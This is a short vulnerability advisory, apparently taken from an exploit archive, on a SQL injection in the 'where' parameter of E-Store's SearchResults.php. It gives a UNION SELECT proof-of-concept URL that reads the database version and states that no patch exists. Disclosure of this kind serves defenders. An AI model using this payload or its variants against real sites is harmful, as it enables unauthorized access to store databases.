E-Store SQL Injection Vulnerability

2009-12-11T00:00:00
ID 1337DAY-ID-10194
Type zdt
Reporter Salvatore Fresta
Modified 2009-12-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================
E-Store SQL Injection Vulnerability
===================================

E-Store SQL Injection Vulnerability
 
 Name              E-Store
 Vendor            http://www.getaphpsite.com
 
X. INDEX
 
 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 VI.   DISCLOSURE TIMELINE
 
 
I. ABOUT THE APPLICATION
 
E-Store is a commercial PHP e-commerce.
 
 
II. DESCRIPTION
 
This application presents a SQL Injection bug.
 
 
III. ANALYSIS
 
Summary:
 
 A) SQL Injection
 
A) SQL Injection
 
The GET where parameter  passed to SearchResults.php has not
properly sanitised. Because of the affected query, the Magic
Quotes GPC flag (php.in) may be on.
 
 
IV. SAMPLE CODE
 
http://site/path/SearchResults.php?SearchTerm=&where=ItemName UNION
ALL SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23&ord1=ItemName&ord2=asc&search1=Go!
 
 
V. FIX
 
No patch.



#  0day.today [2018-04-04]  #